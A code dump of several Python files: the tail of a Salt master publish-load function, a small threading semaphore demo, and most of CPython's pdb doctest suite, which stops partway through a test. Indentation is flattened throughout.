}
# if you specified a master id, lets put that in the load
if 'master_id' in self.opts:
load['master_id'] = self.opts['master_id']
# if someone passed us one, use that
if 'master_id' in extra:
load['master_id'] = extra['master_id']
# Only add the delimiter to the pub data if it is non-default
if delimiter != DEFAULT_TARGET_DELIM:
load['delimiter'] = delimiter
if 'id' in extra:
load['id'] = extra['id']
if 'tgt_type' in clear_load:
load['tgt_type'] = clear_load['tgt_type']
if 'to' in clear_load:
load['to'] = clear_load['to']
if 'kwargs' in clear_load:
if 'ret_config' in clear_load['kwargs']:
load['ret_config'] = clear_load['kwargs'].get('ret_config')
if 'metadata' in clear_load['kwargs']:
load['metadata'] = clear_load['kwargs'].get('metadata')
if 'module_executors' in clear_load['kwargs']:
load['module_executors'] = clear_load['kwargs'].get('module_executors')
if 'executor_opts' in clear_load['kwargs']:
load['executor_opts'] = clear_load['kwargs'].get('executor_opts')
if 'ret_kwargs' in clear_load['kwargs']:
load['ret_kwargs'] = clear_load['kwargs'].get('ret_kwargs')
if 'user' in clear_load:
log.info(
'User %s Published command %s with jid %s',
clear_load['user'], clear_load['fun'], clear_load['jid']
)
load['user'] = clear_load['user']
else:
log.info(
'Published command %s with jid %s',
clear_load['fun'], clear_load['jid']
)
log.debug('Published command details %s', load)
return load
def ping(self, clear_load):
'''
Send the load back to the sender.
'''
return clear_load
|
semaphore.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import time
import threading
def run():
semaphore.acquire()
print(f'{threading.current_thread().name} is running at {time.ctime()}.')
time.sleep(1)
semaphore.release()
semaphore = threading.BoundedSemaphore(2)
for i in range(6):
threading.Thread(target=run).start()
print(f'Active count: {threading.active_count()-1}') # 所有线程启动后均为活动状态
|
test_pdb.py
|
# A test suite for pdb; not very comprehensive at the moment.
import doctest
import os
import pdb
import sys
import types
import unittest
import subprocess
import textwrap
from contextlib import ExitStack
from io import StringIO
from test import support
# This little helper class is essential for testing pdb under doctest.
from test.test_doctest import _FakeInput
from unittest.mock import patch
class PdbTestInput(object):
"""Context manager that makes testing Pdb in doctests easier."""
def __init__(self, input):
self.input = input
def __enter__(self):
self.real_stdin = sys.stdin
sys.stdin = _FakeInput(self.input)
self.orig_trace = sys.gettrace() if hasattr(sys, 'gettrace') else None
def __exit__(self, *exc):
sys.stdin = self.real_stdin
if self.orig_trace:
sys.settrace(self.orig_trace)
def test_pdb_displayhook():
"""This tests the custom displayhook for pdb.
>>> def test_function(foo, bar):
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... pass
>>> with PdbTestInput([
... 'foo',
... 'bar',
... 'for i in range(5): print(i)',
... 'continue',
... ]):
... test_function(1, None)
> <doctest test.test_pdb.test_pdb_displayhook[0]>(3)test_function()
-> pass
(Pdb) foo
1
(Pdb) bar
(Pdb) for i in range(5): print(i)
0
1
2
3
4
(Pdb) continue
"""
def test_pdb_basic_commands():
"""Test the basic commands of pdb.
>>> def test_function_2(foo, bar='default'):
... print(foo)
... for i in range(5):
... print(i)
... print(bar)
... for i in range(10):
... never_executed
... print('after for')
... print('...')
... return foo.upper()
>>> def test_function3(arg=None, *, kwonly=None):
... pass
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... ret = test_function_2('baz')
... test_function3(kwonly=True)
... print(ret)
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'step', # entering the function call
... 'args', # display function args
... 'list', # list function source
... 'bt', # display backtrace
... 'up', # step up to test_function()
... 'down', # step down to test_function_2() again
... 'next', # stepping to print(foo)
... 'next', # stepping to the for loop
... 'step', # stepping into the for loop
... 'until', # continuing until out of the for loop
... 'next', # executing the print(bar)
... 'jump 8', # jump over second for loop
... 'return', # return out of function
... 'retval', # display return value
... 'next', # step to test_function3()
... 'step', # stepping into test_function3()
... 'args', # display function args
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_pdb_basic_commands[2]>(3)test_function()
-> ret = test_function_2('baz')
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(1)test_function_2()
-> def test_function_2(foo, bar='default'):
(Pdb) args
foo = 'baz'
bar = 'default'
(Pdb) list
1 -> def test_function_2(foo, bar='default'):
2 print(foo)
3 for i in range(5):
4 print(i)
5 print(bar)
6 for i in range(10):
7 never_executed
8 print('after for')
9 print('...')
10 return foo.upper()
[EOF]
(Pdb) bt
...
<doctest test.test_pdb.test_pdb_basic_commands[3]>(21)<module>()
-> test_function()
<doctest test.test_pdb.test_pdb_basic_commands[2]>(3)test_function()
-> ret = test_function_2('baz')
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(1)test_function_2()
-> def test_function_2(foo, bar='default'):
(Pdb) up
> <doctest test.test_pdb.test_pdb_basic_commands[2]>(3)test_function()
-> ret = test_function_2('baz')
(Pdb) down
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(1)test_function_2()
-> def test_function_2(foo, bar='default'):
(Pdb) next
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(2)test_function_2()
-> print(foo)
(Pdb) next
baz
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(3)test_function_2()
-> for i in range(5):
(Pdb) step
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(4)test_function_2()
-> print(i)
(Pdb) until
0
1
2
3
4
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(5)test_function_2()
-> print(bar)
(Pdb) next
default
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(6)test_function_2()
-> for i in range(10):
(Pdb) jump 8
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(8)test_function_2()
-> print('after for')
(Pdb) return
after for
...
--Return--
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(10)test_function_2()->'BAZ'
-> return foo.upper()
(Pdb) retval
'BAZ'
(Pdb) next
> <doctest test.test_pdb.test_pdb_basic_commands[2]>(4)test_function()
-> test_function3(kwonly=True)
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_basic_commands[1]>(1)test_function3()
-> def test_function3(arg=None, *, kwonly=None):
(Pdb) args
arg = None
kwonly = True
(Pdb) continue
BAZ
"""
def test_pdb_breakpoint_commands():
"""Test basic commands related to breakpoints.
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... print(1)
... print(2)
... print(3)
... print(4)
First, need to clear bdb state that might be left over from previous tests.
Otherwise, the new breakpoints might get assigned different numbers.
>>> from bdb import Breakpoint
>>> Breakpoint.next = 1
>>> Breakpoint.bplist = {}
>>> Breakpoint.bpbynumber = [None]
Now test the breakpoint commands. NORMALIZE_WHITESPACE is needed because
the breakpoint list outputs a tab for the "stop only" and "ignore next"
lines, which we don't want to put in here.
>>> with PdbTestInput([ # doctest: +NORMALIZE_WHITESPACE
... 'break 3',
... 'disable 1',
... 'ignore 1 10',
... 'condition 1 1 < 2',
... 'break 4',
... 'break 4',
... 'break',
... 'clear 3',
... 'break',
... 'condition 1',
... 'enable 1',
... 'clear 1',
... 'commands 2',
... 'p "42"',
... 'print("42", 7*6)', # Issue 18764 (not about breakpoints)
... 'end',
... 'continue', # will stop at breakpoint 2 (line 4)
... 'clear', # clear all!
... 'y',
... 'tbreak 5',
... 'continue', # will stop at temporary breakpoint
... 'break', # make sure breakpoint is gone
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>(3)test_function()
-> print(1)
(Pdb) break 3
Breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) disable 1
Disabled breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) ignore 1 10
Will ignore next 10 crossings of breakpoint 1.
(Pdb) condition 1 1 < 2
New condition set for breakpoint 1.
(Pdb) break 4
Breakpoint 2 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) break 4
Breakpoint 3 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) break
Num Type Disp Enb Where
1 breakpoint keep no at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
stop only if 1 < 2
ignore next 10 hits
2 breakpoint keep yes at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
3 breakpoint keep yes at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) clear 3
Deleted breakpoint 3 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) break
Num Type Disp Enb Where
1 breakpoint keep no at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
stop only if 1 < 2
ignore next 10 hits
2 breakpoint keep yes at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) condition 1
Breakpoint 1 is now unconditional.
(Pdb) enable 1
Enabled breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) clear 1
Deleted breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) commands 2
(com) p "42"
(com) print("42", 7*6)
(com) end
(Pdb) continue
1
'42'
42 42
> <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>(4)test_function()
-> print(2)
(Pdb) clear
Clear all breaks? y
Deleted breakpoint 2 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) tbreak 5
Breakpoint 4 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:5
(Pdb) continue
2
Deleted breakpoint 4 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:5
> <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>(5)test_function()
-> print(3)
(Pdb) break
(Pdb) continue
3
4
"""
def do_nothing():
pass
def do_something():
print(42)
def test_list_commands():
"""Test the list and source commands of pdb.
>>> def test_function_2(foo):
... import test.test_pdb
... test.test_pdb.do_nothing()
... 'some...'
... 'more...'
... 'code...'
... 'to...'
... 'make...'
... 'a...'
... 'long...'
... 'listing...'
... 'useful...'
... '...'
... '...'
... return foo
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... ret = test_function_2('baz')
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'list', # list first function
... 'step', # step into second function
... 'list', # list second function
... 'list', # continue listing to EOF
... 'list 1,3', # list specific lines
... 'list x', # invalid argument
... 'next', # step to import
... 'next', # step over import
... 'step', # step into do_nothing
... 'longlist', # list all lines
... 'source do_something', # list all lines of function
... 'source fooxxx', # something that doesn't exit
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_list_commands[1]>(3)test_function()
-> ret = test_function_2('baz')
(Pdb) list
1 def test_function():
2 import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
3 -> ret = test_function_2('baz')
[EOF]
(Pdb) step
--Call--
> <doctest test.test_pdb.test_list_commands[0]>(1)test_function_2()
-> def test_function_2(foo):
(Pdb) list
1 -> def test_function_2(foo):
2 import test.test_pdb
3 test.test_pdb.do_nothing()
4 'some...'
5 'more...'
6 'code...'
7 'to...'
8 'make...'
9 'a...'
10 'long...'
11 'listing...'
(Pdb) list
12 'useful...'
13 '...'
14 '...'
15 return foo
[EOF]
(Pdb) list 1,3
1 -> def test_function_2(foo):
2 import test.test_pdb
3 test.test_pdb.do_nothing()
(Pdb) list x
*** ...
(Pdb) next
> <doctest test.test_pdb.test_list_commands[0]>(2)test_function_2()
-> import test.test_pdb
(Pdb) next
> <doctest test.test_pdb.test_list_commands[0]>(3)test_function_2()
-> test.test_pdb.do_nothing()
(Pdb) step
--Call--
> ...test_pdb.py(...)do_nothing()
-> def do_nothing():
(Pdb) longlist
... -> def do_nothing():
... pass
(Pdb) source do_something
... def do_something():
... print(42)
(Pdb) source fooxxx
*** ...
(Pdb) continue
"""
def test_post_mortem():
"""Test post mortem traceback debugging.
>>> def test_function_2():
... try:
... 1/0
... finally:
... print('Exception!')
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... test_function_2()
... print('Not reached.')
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'next', # step over exception-raising call
... 'bt', # get a backtrace
... 'list', # list code of test_function()
... 'down', # step into test_function_2()
... 'list', # list code of test_function_2()
... 'continue',
... ]):
... try:
... test_function()
... except ZeroDivisionError:
... print('Correctly reraised.')
> <doctest test.test_pdb.test_post_mortem[1]>(3)test_function()
-> test_function_2()
(Pdb) next
Exception!
ZeroDivisionError: division by zero
> <doctest test.test_pdb.test_post_mortem[1]>(3)test_function()
-> test_function_2()
(Pdb) bt
...
<doctest test.test_pdb.test_post_mortem[2]>(10)<module>()
-> test_function()
> <doctest test.test_pdb.test_post_mortem[1]>(3)test_function()
-> test_function_2()
<doctest test.test_pdb.test_post_mortem[0]>(3)test_function_2()
-> 1/0
(Pdb) list
1 def test_function():
2 import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
3 -> test_function_2()
4 print('Not reached.')
[EOF]
(Pdb) down
> <doctest test.test_pdb.test_post_mortem[0]>(3)test_function_2()
-> 1/0
(Pdb) list
1 def test_function_2():
2 try:
3 >> 1/0
4 finally:
5 -> print('Exception!')
[EOF]
(Pdb) continue
Correctly reraised.
"""
def test_pdb_skip_modules():
"""This illustrates the simple case of module skipping.
>>> def skip_module():
... import string
... import pdb; pdb.Pdb(skip=['stri*'], nosigint=True, readrc=False).set_trace()
... string.capwords('FOO')
>>> with PdbTestInput([
... 'step',
... 'continue',
... ]):
... skip_module()
> <doctest test.test_pdb.test_pdb_skip_modules[0]>(4)skip_module()
-> string.capwords('FOO')
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_skip_modules[0]>(4)skip_module()->None
-> string.capwords('FOO')
(Pdb) continue
"""
# Module for testing skipping of module that makes a callback
mod = types.ModuleType('module_to_skip')
exec('def foo_pony(callback): x = 1; callback(); return None', mod.__dict__)
def test_pdb_skip_modules_with_callback():
"""This illustrates skipping of modules that call into other code.
>>> def skip_module():
... def callback():
... return None
... import pdb; pdb.Pdb(skip=['module_to_skip*'], nosigint=True, readrc=False).set_trace()
... mod.foo_pony(callback)
>>> with PdbTestInput([
... 'step',
... 'step',
... 'step',
... 'step',
... 'step',
... 'continue',
... ]):
... skip_module()
... pass # provides something to "step" to
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(5)skip_module()
-> mod.foo_pony(callback)
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(2)callback()
-> def callback():
(Pdb) step
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(3)callback()
-> return None
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(3)callback()->None
-> return None
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(5)skip_module()->None
-> mod.foo_pony(callback)
(Pdb) step
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[1]>(10)<module>()
-> pass # provides something to "step" to
(Pdb) continue
"""
def test_pdb_continue_in_bottomframe():
"""Test that "continue" and "next" work properly in bottom frame (issue #5294).
>>> def test_function():
... import pdb, sys; inst = pdb.Pdb(nosigint=True, readrc=False)
... inst.set_trace()
... inst.botframe = sys._getframe() # hackery to get the right botframe
... print(1)
... print(2)
... print(3)
... print(4)
>>> with PdbTestInput([ # doctest: +ELLIPSIS
... 'next',
... 'break 7',
... 'continue',
... 'next',
... 'continue',
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(4)test_function()
-> inst.botframe = sys._getframe() # hackery to get the right botframe
(Pdb) next
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(5)test_function()
-> print(1)
(Pdb) break 7
Breakpoint ... at <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>:7
(Pdb) continue
1
2
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(7)test_function()
-> print(3)
(Pdb) next
3
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(8)test_function()
-> print(4)
(Pdb) continue
4
"""
def pdb_invoke(method, arg):
"""Run pdb.method(arg)."""
getattr(pdb.Pdb(nosigint=True, readrc=False), method)(arg)
def test_pdb_run_with_incorrect_argument():
"""Testing run and runeval with incorrect first argument.
>>> pti = PdbTestInput(['continue',])
>>> with pti:
... pdb_invoke('run', lambda x: x)
Traceback (most recent call last):
TypeError: exec() arg 1 must be a string, bytes or code object
>>> with pti:
... pdb_invoke('runeval', lambda x: x)
Traceback (most recent call last):
TypeError: eval() arg 1 must be a string, bytes or code object
"""
def test_pdb_run_with_code_object():
"""Testing run and runeval with code object as a first argument.
>>> with PdbTestInput(['step','x', 'continue']): # doctest: +ELLIPSIS
... pdb_invoke('run', compile('x=1', '<string>', 'exec'))
> <string>(1)<module>()...
(Pdb) step
--Return--
> <string>(1)<module>()->None
(Pdb) x
1
(Pdb) continue
>>> with PdbTestInput(['x', 'continue']):
... x=0
... pdb_invoke('runeval', compile('x+1', '<string>', 'eval'))
> <string>(1)<module>()->None
(Pdb) x
1
(Pdb) continue
"""
def test_next_until_return_at_return_event():
"""Test that pdb stops after a next/until/return issued at a return debug event.
>>> def test_function_2():
... x = 1
... x = 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... test_function_2()
... test_function_2()
... test_function_2()
... end = 1
>>> from bdb import Breakpoint
>>> Breakpoint.next = 1
>>> with PdbTestInput(['break test_function_2',
... 'continue',
... 'return',
... 'next',
... 'continue',
... 'return',
... 'until',
... 'continue',
... 'return',
... 'return',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(3)test_function()
-> test_function_2()
(Pdb) break test_function_2
Breakpoint 1 at <doctest test.test_pdb.test_next_until_return_at_return_event[0]>:1
(Pdb) continue
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(2)test_function_2()
-> x = 1
(Pdb) return
--Return--
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(3)test_function_2()->None
-> x = 2
(Pdb) next
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(4)test_function()
-> test_function_2()
(Pdb) continue
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(2)test_function_2()
-> x = 1
(Pdb) return
--Return--
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(3)test_function_2()->None
-> x = 2
(Pdb) until
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(5)test_function()
-> test_function_2()
(Pdb) continue
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(2)test_function_2()
-> x = 1
(Pdb) return
--Return--
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(3)test_function_2()->None
-> x = 2
(Pdb) return
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(6)test_function()
-> end = 1
(Pdb) continue
"""
def test_pdb_next_command_for_generator():
"""Testing skip unwindng stack on yield for generators for "next" command
>>> def test_gen():
... yield 0
... return 1
... yield 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... it = test_gen()
... try:
... if next(it) != 0:
... raise AssertionError
... next(it)
... except StopIteration as ex:
... if ex.value != 1:
... raise AssertionError
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'step',
... 'next',
... 'next',
... 'step',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(3)test_function()
-> it = test_gen()
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(4)test_function()
-> try:
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(5)test_function()
-> if next(it) != 0:
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(1)test_gen()
-> def test_gen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(2)test_gen()
-> yield 0
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(3)test_gen()
-> return 1
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(3)test_gen()->1
-> return 1
(Pdb) step
StopIteration: 1
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(7)test_function()
-> next(it)
(Pdb) continue
finished
"""
def test_pdb_next_command_for_coroutine():
"""Testing skip unwindng stack on yield for coroutines for "next" command
>>> import asyncio
>>> async def test_coro():
... await asyncio.sleep(0)
... await asyncio.sleep(0)
... await asyncio.sleep(0)
>>> async def test_main():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... await test_coro()
>>> def test_function():
... loop = asyncio.new_event_loop()
... loop.run_until_complete(test_main())
... loop.close()
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'next',
... 'next',
... 'next',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[2]>(3)test_main()
-> await test_coro()
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[1]>(1)test_coro()
-> async def test_coro():
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[1]>(2)test_coro()
-> await asyncio.sleep(0)
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[1]>(3)test_coro()
-> await asyncio.sleep(0)
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[1]>(4)test_coro()
-> await asyncio.sleep(0)
(Pdb) next
Internal StopIteration
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[2]>(3)test_main()
-> await test_coro()
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[2]>(3)test_main()->None
-> await test_coro()
(Pdb) continue
finished
"""
def test_pdb_next_command_for_asyncgen():
"""Testing skip unwindng stack on yield for coroutines for "next" command
>>> import asyncio
>>> async def agen():
... yield 1
... await asyncio.sleep(0)
... yield 2
>>> async def test_coro():
... async for x in agen():
... print(x)
>>> async def test_main():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... await test_coro()
>>> def test_function():
... loop = asyncio.new_event_loop()
... loop.run_until_complete(test_main())
... loop.close()
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'next',
... 'next',
... 'step',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[3]>(3)test_main()
-> await test_coro()
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[2]>(1)test_coro()
-> async def test_coro():
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[2]>(2)test_coro()
-> async for x in agen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[2]>(3)test_coro()
-> print(x)
(Pdb) next
1
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[2]>(2)test_coro()
-> async for x in agen():
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[1]>(2)agen()
-> yield 1
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[1]>(3)agen()
-> await asyncio.sleep(0)
(Pdb) continue
2
finished
"""
def test_pdb_return_command_for_generator():
"""Testing no unwindng stack on yield for generators
for "return" command
>>> def test_gen():
... yield 0
... return 1
... yield 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... it = test_gen()
... try:
... if next(it) != 0:
... raise AssertionError
... next(it)
... except StopIteration as ex:
... if ex.value != 1:
... raise AssertionError
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'step',
... 'return',
... 'step',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(3)test_function()
-> it = test_gen()
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(4)test_function()
-> try:
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(5)test_function()
-> if next(it) != 0:
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_return_command_for_generator[0]>(1)test_gen()
-> def test_gen():
(Pdb) return
StopIteration: 1
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(7)test_function()
-> next(it)
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(8)test_function()
-> except StopIteration as ex:
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(9)test_function()
-> if ex.value != 1:
(Pdb) continue
finished
"""
def test_pdb_return_command_for_coroutine():
"""Testing no unwindng stack on yield for coroutines for "return" command
>>> import asyncio
>>> async def test_coro():
... await asyncio.sleep(0)
... await asyncio.sleep(0)
... await asyncio.sleep(0)
>>> async def test_main():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... await test_coro()
>>> def test_function():
... loop = asyncio.new_event_loop()
... loop.run_until_complete(test_main())
... loop.close()
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_return_command_for_coroutine[2]>(3)test_main()
-> await test_coro()
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_return_command_for_coroutine[1]>(1)test_coro()
-> async def test_coro():
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_coroutine[1]>(2)test_coro()
-> await asyncio.sleep(0)
(Pdb) next
> <doctest test.test_pdb.test_pdb_return_command_for_coroutine[1]>(3)test_coro()
-> await asyncio.sleep(0)
(Pdb) continue
finished
"""
def test_pdb_until_command_for_generator():
"""Testing no unwindng stack on yield for generators
for "until" command if target breakpoing is not reached
>>> def test_gen():
... yield 0
... yield 1
... yield 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... for i in test_gen():
... print(i)
... print("finished")
>>> with PdbTestInput(['step',
... 'until 4',
... 'step',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_until_command_for_generator[1]>(3)test_function()
-> for i in test_gen():
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_until_command_for_generator[0]>(1)test_gen()
-> def test_gen():
(Pdb) until 4
0
1
> <doctest test.test_pdb.test_pdb_until_command_for_generator[0]>(4)test_gen()
-> yield 2
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_until_command_for_generator[0]>(4)test_gen()->2
-> yield 2
(Pdb) step
> <doctest test.test_pdb.test_pdb_until_command_for_generator[1]>(4)test_function()
-> print(i)
(Pdb) continue
2
finished
"""
def test_pdb_until_command_for_coroutine():
"""Testing no unwindng stack for coroutines
for "until" command if target breakpoing is not reached
>>> import asyncio
>>> async def test_coro():
... print(0)
... await asyncio.sleep(0)
... print(1)
... await asyncio.sleep(0)
... print(2)
... await asyncio.sleep(0)
... print(3)
>>> async def test_main():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... await test_coro()
>>> def test_function():
... loop = asyncio.new_event_loop()
... loop.run_until_complete(test_main())
... loop.close()
... print("finished")
>>> with PdbTestInput(['step',
... 'until 8',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_until_command_for_coroutine[2]>(3)test_main()
-> await test_coro()
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_until_command_for_coroutine[1]>(1)test_coro()
-> async def test_coro():
(Pdb) until 8
0
1
2
> <doctest test.test_pdb.test_pdb_until_command_for_coroutine[1]>(8)test_coro()
-> print(3)
(Pdb) continue
3
finished
"""
def test_pdb_next_command_in_generator_for_loop():
"""The next command on returning from a generator controlled by a for loop.
>>> def test_gen():
... yield 0
... return 1
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... for i in test_gen():
... print('value', i)
... x = 123
>>> with PdbTestInput(['break test_gen',
... 'continue',
... 'next',
... 'next',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[1]>(3)test_function()
-> for i in test_gen():
(Pdb) break test_gen
Breakpoint 6 at <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[0]>:1
(Pdb) continue
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[0]>(2)test_gen()
-> yield 0
(Pdb) next
value 0
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[0]>(3)test_gen()
-> return 1
(Pdb) next
Internal StopIteration: 1
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[1]>(3)test_function()
-> for i in test_gen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[1]>(5)test_function()
-> x = 123
(Pdb) continue
"""
def test_pdb_next_command_subiterator():
"""The next command in a generator with a subiterator.
>>> def test_subgenerator():
... yield 0
... return 1
>>> def test_gen():
... x = yield from test_subgenerator()
... return x
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... for i in test_gen():
... print('value', i)
... x = 123
>>> with PdbTestInput(['step',
... 'step',
... 'next',
... 'next',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_subiterator[2]>(3)test_function()
-> for i in test_gen():
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_subiterator[1]>(1)test_gen()
-> def test_gen():
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_subiterator[1]>(2)test_gen()
-> x = yield from test_subgenerator()
(Pdb) next
value 0
> <doctest test.test_pdb.test_pdb_next_command_subiterator[1]>(3)test_gen()
-> return x
(Pdb) next
Internal StopIteration: 1
> <doctest test.test_pdb.test_pdb_next_command_subiterator[2]>(3)test_function()
-> for i in test_gen():
(Pdb) next
